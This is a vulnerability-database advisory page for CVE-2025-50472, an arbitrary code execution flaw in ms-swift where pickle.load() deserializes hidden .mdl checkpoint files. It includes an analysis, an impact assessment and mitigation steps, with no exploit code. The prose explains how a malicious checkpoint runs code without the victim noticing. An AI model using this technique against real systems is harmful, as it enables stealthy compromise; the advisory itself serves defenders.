Skip to main content

CVE-2025-50472: n/a

Critical
VulnerabilityCVE-2025-50472cvecve-2025-50472
Published: Fri Aug 01 2025 (08/01/2025, 00:00:00 UTC)
Source: CVE Database V5

Description

The modelscope/ms-swift library thru 2.6.1 is vulnerable to arbitrary code execution through deserialization of untrusted data within the `load_model_meta()` function of the `ModelFileSystemCache()` class. Attackers can execute arbitrary code and commands by crafting a malicious serialized `.mdl` payload, exploiting the use of `pickle.load()` on data from potentially untrusted sources. This vulnerability allows for remote code execution (RCE) by deceiving victims into loading a seemingly harmless checkpoint during a normal training process, thereby enabling attackers to execute arbitrary code on the targeted machine. Note that the payload file is a hidden file, making it difficult for the victim to detect tampering. More importantly, during the model training process, after the `.mdl` file is loaded and executes arbitrary code, the normal training process remains unaffected'meaning the user remains unaware of the arbitrary code execution.

AI-Powered Analysis

AILast updated: 08/01/2025, 16:32:53 UTC

Technical Analysis

CVE-2025-50472 is a critical security vulnerability affecting the modelscope/ms-swift library up to version 2.6.1. The vulnerability arises from unsafe deserialization practices within the `load_model_meta()` function of the `ModelFileSystemCache()` class. Specifically, the library uses Python's `pickle.load()` function to deserialize `.mdl` files, which are model checkpoint files used during machine learning model training. Because `pickle` can execute arbitrary code during deserialization, an attacker who crafts a malicious `.mdl` payload can achieve remote code execution (RCE) on the victim's system. The attack vector involves deceiving the victim into loading a seemingly benign checkpoint file during a normal training process. The malicious payload is hidden as a file with a `.mdl` extension and is designed to execute arbitrary commands without disrupting the normal training workflow, making detection difficult. This stealthy execution means the victim remains unaware that their system has been compromised. The vulnerability does not require user interaction beyond loading the malicious checkpoint, and no authentication is needed if the attacker can deliver the payload to the victim's environment. Although no known exploits are reported in the wild yet, the nature of the vulnerability and the widespread use of the modelscope/ms-swift library in machine learning workflows make this a significant threat. The lack of a patch or mitigation guidance at the time of publication further elevates the risk.

Potential Impact

For European organizations, this vulnerability poses a substantial risk, especially for entities involved in AI research, data science, and machine learning development. The ability to execute arbitrary code remotely can lead to full system compromise, data exfiltration, lateral movement within networks, and persistent backdoors. Confidentiality is at high risk as attackers can access sensitive training data, proprietary models, and intellectual property. Integrity is compromised because attackers can alter model training processes or inject malicious code into AI pipelines, potentially causing erroneous outputs or sabotaged AI models. Availability may also be affected if attackers deploy ransomware or disrupt critical AI services. Given the stealthy nature of the attack, detection and incident response become challenging, increasing the window of exposure. European organizations in sectors such as finance, healthcare, automotive, and government, which increasingly rely on AI models, are particularly vulnerable. The threat also extends to cloud environments and research institutions where modelscope/ms-swift is used. The absence of a CVSS score and patches means organizations must proactively assess and mitigate the risk to avoid potential exploitation.

Mitigation Recommendations

1. Immediately audit all usage of modelscope/ms-swift library in AI/ML workflows and identify any instances of loading `.mdl` checkpoint files from untrusted or external sources. 2. Implement strict validation and integrity checks on all model checkpoint files before loading, such as cryptographic signatures or hashes, to ensure authenticity and integrity. 3. Avoid using `pickle` or any unsafe deserialization methods on untrusted data; consider replacing or wrapping the `load_model_meta()` function to use safer serialization formats like JSON or protobuf with strict schema validation. 4. Restrict file system permissions and access controls to prevent unauthorized users from placing or modifying `.mdl` files in model directories. 5. Monitor and log all model loading activities and anomalous file access patterns to detect potential exploitation attempts. 6. Isolate AI/ML training environments from critical production systems to limit the blast radius of a successful attack. 7. Stay updated with the modelscope/ms-swift project for any forthcoming patches or security advisories and apply them promptly. 8. Educate data scientists and ML engineers about the risks of loading untrusted model checkpoints and enforce secure development practices. 9. Employ endpoint detection and response (EDR) tools capable of detecting suspicious process behaviors indicative of code execution from deserialization.

Need more detailed analysis?Get Pro

Technical Details

Data Version
5.1
Assigner Short Name
mitre
Date Reserved
2025-06-16T00:00:00.000Z
Cvss Version
null
State
PUBLISHED

Threat ID: 688ce8a8ad5a09ad00ca4603

Added to database: 8/1/2025, 4:17:44 PM

Last enriched: 8/1/2025, 4:32:53 PM

Last updated: 8/26/2025, 2:02:55 AM

Views: 25

Actions

PRO

Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.

Please log in to the Console to use AI analysis features.

Need enhanced features?

Contact root@offseq.com for Pro access with improved analysis and higher rate limits.

Latest Threats